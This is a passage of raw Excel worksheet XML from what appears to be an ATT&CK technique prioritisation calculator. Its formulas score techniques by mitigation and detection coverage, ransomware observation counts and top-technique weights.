        <f t="array" ref="AJ80">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC80)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK80" s="25">
        <f>IF(AJ80="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL80" s="25" t="str" cm="1">
        <f t="array" ref="AL80">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC80)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM80" s="25">
        <f>IF(AL80="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN80" s="52">
        <v>0</v>
      </c>
      <c r="AO80" s="51"/>
      <c r="AP80" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.6421494169999999E-2</v>
      </c>
      <c r="AQ80" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.12140498056666667</v>
      </c>
      <c r="AR80" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.12140498056666667</v>
      </c>
      <c r="AS80" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT80" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU8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81" spans="1:47">
      <c r="A81" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.921143880952381E-2</v>
      </c>
      <c r="B81" s="25">
        <f>SUM(H81,M81,V81)*(1+SUM(AE81,AG81,AI81,AK81,AM81))</f>
        <v>5.8781054761904761E-2</v>
      </c>
      <c r="C81" s="25" t="s">
        <v>409</v>
      </c>
      <c r="D81" s="25" t="s">
        <v>410</v>
      </c>
      <c r="E81" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F81" s="51">
        <v>0</v>
      </c>
      <c r="G81" s="51">
        <v>1</v>
      </c>
      <c r="H81" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I81">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J81">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K81">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L81">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M81" s="44">
        <v>4.01915E-3</v>
      </c>
      <c r="N81" s="51">
        <v>0</v>
      </c>
      <c r="O81" s="51">
        <v>1</v>
      </c>
      <c r="P81" s="51">
        <v>0</v>
      </c>
      <c r="Q81" s="51">
        <v>0</v>
      </c>
      <c r="R81" s="51"/>
      <c r="S81" s="51">
        <v>0</v>
      </c>
      <c r="T81" s="51"/>
      <c r="U81" s="51">
        <v>0</v>
      </c>
      <c r="V81" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W81">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X81">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y81">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z81">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA81">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB81">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC81" s="29"/>
      <c r="AD81" s="25" t="str" cm="1">
        <f t="array" ref="AD81">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC81)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE81" s="25">
        <f>IF(AD81="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF81" s="25" t="str" cm="1">
        <f t="array" ref="AF81">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC81)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG81" s="25">
        <f>IF(AF81="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH81" s="25" t="str" cm="1">
        <f t="array" ref="AH81">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC81)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI81" s="25">
        <f>IF(AH81="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ81" s="25" t="str" cm="1">
        <f t="array" ref="AJ81">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC81)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK81" s="25">
        <f>IF(AJ81="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL81" s="25" t="str" cm="1">
        <f t="array" ref="AL81">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC81)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM81" s="25">
        <f>IF(AL81="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN81" s="60">
        <v>1</v>
      </c>
      <c r="AO81" s="51">
        <v>1</v>
      </c>
      <c r="AP81" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.921143880952381E-2</v>
      </c>
      <c r="AQ81" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.9593684920634919E-2</v>
      </c>
      <c r="AR81" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.9593684920634919E-2</v>
      </c>
      <c r="AS81" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT81" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU8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82" spans="1:47">
      <c r="A82" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.4683586285714283E-2</v>
      </c>
      <c r="B82" s="25">
        <f>SUM(H82,M82,V82)*(1+SUM(AE82,AG82,AI82,AK82,AM82))</f>
        <v>0.11350252952380953</v>
      </c>
      <c r="C82" s="25" t="s">
        <v>411</v>
      </c>
      <c r="D82" s="25" t="s">
        <v>412</v>
      </c>
      <c r="E82" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F82" s="51">
        <v>1</v>
      </c>
      <c r="G82" s="51">
        <v>1</v>
      </c>
      <c r="H82" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I82">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J82">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K82">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L82">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M82" s="44">
        <v>3.9787199999999998E-3</v>
      </c>
      <c r="N82" s="51">
        <v>0</v>
      </c>
      <c r="O82" s="51">
        <v>1</v>
      </c>
      <c r="P82" s="51">
        <v>1</v>
      </c>
      <c r="Q82" s="51">
        <v>0</v>
      </c>
      <c r="R82" s="51"/>
      <c r="S82" s="51">
        <v>0</v>
      </c>
      <c r="T82" s="51"/>
      <c r="U82" s="51">
        <v>0</v>
      </c>
      <c r="V82" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>9.5238095238095229E-3</v>
      </c>
      <c r="W82">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X82">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y82">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z82">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA82">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB82">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC82" s="29" t="s">
        <v>341</v>
      </c>
      <c r="AD82" s="25" t="str" cm="1">
        <f t="array" ref="AD82">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC82)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE82" s="25">
        <f>IF(AD82="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF82" s="25" t="str" cm="1">
        <f t="array" ref="AF82">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC82)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG82" s="25">
        <f>IF(AF82="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH82" s="25" t="str" cm="1">
        <f t="array" ref="AH82">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC82)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI82" s="25">
        <f>IF(AH82="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ82" s="25" t="str" cm="1">
        <f t="array" ref="AJ82">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC82)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK82" s="25">
        <f>IF(AJ82="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL82" s="25" t="str" cm="1">
        <f t="array" ref="AL82">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC82)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM82" s="25">
        <f>IF(AL82="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN82" s="60">
        <v>1</v>
      </c>
      <c r="AO82" s="51">
        <v>1</v>
      </c>
      <c r="AP82" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.4683586285714283E-2</v>
      </c>
      <c r="AQ82" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.7834176507936509E-2</v>
      </c>
      <c r="AR82" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.7834176507936509E-2</v>
      </c>
      <c r="AS82" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT82" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU8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83" spans="1:47" ht="32.1">
      <c r="A83" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.15102698095666667</v>
      </c>
      <c r="B83" s="25">
        <f>SUM(H83,M83,V83)*(1+SUM(AE83,AG83,AI83,AK83,AM83))</f>
        <v>0.51026980956666679</v>
      </c>
      <c r="C83" s="25" t="s">
        <v>413</v>
      </c>
      <c r="D83" s="25" t="s">
        <v>414</v>
      </c>
      <c r="E83" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F83" s="51">
        <v>2</v>
      </c>
      <c r="G83" s="51">
        <v>2</v>
      </c>
      <c r="H83" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.2</v>
      </c>
      <c r="I83">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J83">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K83">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L83">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M83" s="44">
        <v>2.7091300000000001E-3</v>
      </c>
      <c r="N83" s="51">
        <v>0</v>
      </c>
      <c r="O83" s="51">
        <v>4</v>
      </c>
      <c r="P83" s="51">
        <v>2</v>
      </c>
      <c r="Q83" s="51">
        <v>4</v>
      </c>
      <c r="R83" s="52" t="s">
        <v>161</v>
      </c>
      <c r="S83" s="51">
        <v>7</v>
      </c>
      <c r="T83" s="51" t="s">
        <v>415</v>
      </c>
      <c r="U83" s="51">
        <v>7</v>
      </c>
      <c r="V83" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.18095238095238095</v>
      </c>
      <c r="W83">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>14</v>
      </c>
      <c r="X83">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Y83">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Z83">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>10</v>
      </c>
      <c r="AA83">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.1</v>
      </c>
      <c r="AB83">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.1</v>
      </c>
      <c r="AC83" s="29" t="s">
        <v>416</v>
      </c>
      <c r="AD83" s="25" t="str" cm="1">
        <f t="array" ref="AD83">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC83)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE83" s="25">
        <f>IF(AD83="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF83" s="25" t="str" cm="1">
        <f t="array" ref="AF83">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC83)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG83" s="25">
        <f>IF(AF83="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH83" s="25" t="str" cm="1">
        <f t="array" ref="AH83">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC83)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI83" s="25">
        <f>IF(AH83="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ83" s="25" t="str" cm="1">
        <f t="array" ref="AJ83">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC83)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK83" s="25">
        <f>IF(AJ83="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL83" s="25" t="str" cm="1">
        <f t="array" ref="AL83">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC83)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM83" s="25">
        <f>IF(AL83="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN83" s="52">
        <v>3</v>
      </c>
      <c r="AO83" s="51">
        <v>1</v>
      </c>
      <c r="AP83" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.15102698095666667</v>
      </c>
      <c r="AQ83" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.17008993652222226</v>
      </c>
      <c r="AR83" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.17008993652222226</v>
      </c>
      <c r="AS83" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AT83" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU8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84" spans="1:47" ht="32.1">
      <c r="A84" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.11452145613666667</v>
      </c>
      <c r="B84" s="25">
        <f>SUM(H84,M84,V84)*(1+SUM(AE84,AG84,AI84,AK84,AM84))</f>
        <v>0.47854789470000003</v>
      </c>
      <c r="C84" s="25" t="s">
        <v>417</v>
      </c>
      <c r="D84" s="25" t="s">
        <v>418</v>
      </c>
      <c r="E84" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F84" s="51">
        <v>3</v>
      </c>
      <c r="G84" s="51">
        <v>1</v>
      </c>
      <c r="H84" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.2</v>
      </c>
      <c r="I84">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.3</v>
      </c>
      <c r="J84">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="K84">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L84">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M84" s="44">
        <v>2.6675900000000001E-3</v>
      </c>
      <c r="N84" s="51">
        <v>0</v>
      </c>
      <c r="O84" s="51">
        <v>4</v>
      </c>
      <c r="P84" s="51">
        <v>2</v>
      </c>
      <c r="Q84" s="51">
        <v>1</v>
      </c>
      <c r="R84" s="51"/>
      <c r="S84" s="51">
        <v>0</v>
      </c>
      <c r="T84" s="51" t="s">
        <v>419</v>
      </c>
      <c r="U84" s="51">
        <v>13</v>
      </c>
      <c r="V84" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.15714285714285714</v>
      </c>
      <c r="W84">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>13</v>
      </c>
      <c r="X84">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Y84">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Z84">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>7</v>
      </c>
      <c r="AA84">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AB84">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AC84" s="29" t="s">
        <v>420</v>
      </c>
      <c r="AD84" s="25" t="str" cm="1">
        <f t="array" ref="AD84">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC84)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE84" s="25">
        <f>IF(AD84="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF84" s="25" t="str" cm="1">
        <f t="array" ref="AF84">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC84)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG84" s="25">
        <f>IF(AF84="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH84" s="25" t="str" cm="1">
        <f t="array" ref="AH84">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC84)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI84" s="25">
        <f>IF(AH84="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ84" s="25" t="str" cm="1">
        <f t="array" ref="AJ84">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC84)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK84" s="25">
        <f>IF(AJ84="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL84" s="25" t="str" cm="1">
        <f t="array" ref="AL84">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC84)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM84" s="25">
        <f>IF(AL84="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN84" s="62">
        <v>2</v>
      </c>
      <c r="AO84" s="51">
        <v>1</v>
      </c>
      <c r="AP84" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.11452145613666667</v>
      </c>
      <c r="AQ84" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.1595159649</v>
      </c>
      <c r="AR84" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.1595159649</v>
      </c>
      <c r="AS84" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT84" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU8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85" spans="1:47" ht="32.1">
      <c r="A85" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.12631926695666668</v>
      </c>
      <c r="B85" s="25">
